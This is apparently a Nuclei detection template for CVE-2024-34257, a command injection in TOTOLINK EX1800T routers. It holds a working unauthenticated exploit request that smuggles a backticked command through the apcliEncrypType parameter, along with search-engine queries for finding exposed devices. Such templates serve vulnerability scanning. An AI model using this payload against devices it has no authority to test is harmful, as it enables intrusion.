id: CVE-2024-34257 info: name: TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection author: pussycat0x severity: high description: | TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges. impact: | Unauthenticated attackers can execute arbitrary commands via the apcliEncrypType parameter, gaining device administrator privileges. remediation: | Update TOTOLINK EX1800T firmware to a version that patches the command injection vulnerability. reference: - https://github.com/ZackSecurity/VulnerReport/blob/cve/totolink/EX1800T/1.md - https://immense-mirror-b42.notion.site/TOTOLINK-EX1800T-has-an-unauthorized-arbitrary-command-execution-vulnerability-2f3e308f5e1d45a2b8a64f198cacc350 - https://github.com/20142995/nuclei-templates classification: epss-score: 0.88445 epss-percentile: 0.99518 metadata: vendor: totolink product: a3700r_firmware shodan-query: http.title:"totolink" fofa-query: title="totolink" google-query: intitle:"totolink" tags: cve,cve2024,rce,unauth,vkev,vuln variables: file: "{{rand_base(6)}}" http: - raw: - | POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Referer: {{RootURL}}/page/index.html { "token":"", "apcliEncrypType":"`id>../{{file}}.txt`", "topicurl":"setWiFiExtenderConfig" } - | GET /{{file}}.txt HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body_1 words: - '"success": true' - type: regex part: body_2 regex: - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" - type: status status: - 200 # digest: 490a00463044022000b7591c75d55d7c72ac7ea034e8343673c214cfbf419f4d61a6c253354f93f802200b0fad8c884ee99a1b2f6aead4bdb9992d22fd35236dbe34aaba0d5e979c28d3:922c64590222798bb761d5b6d8e72950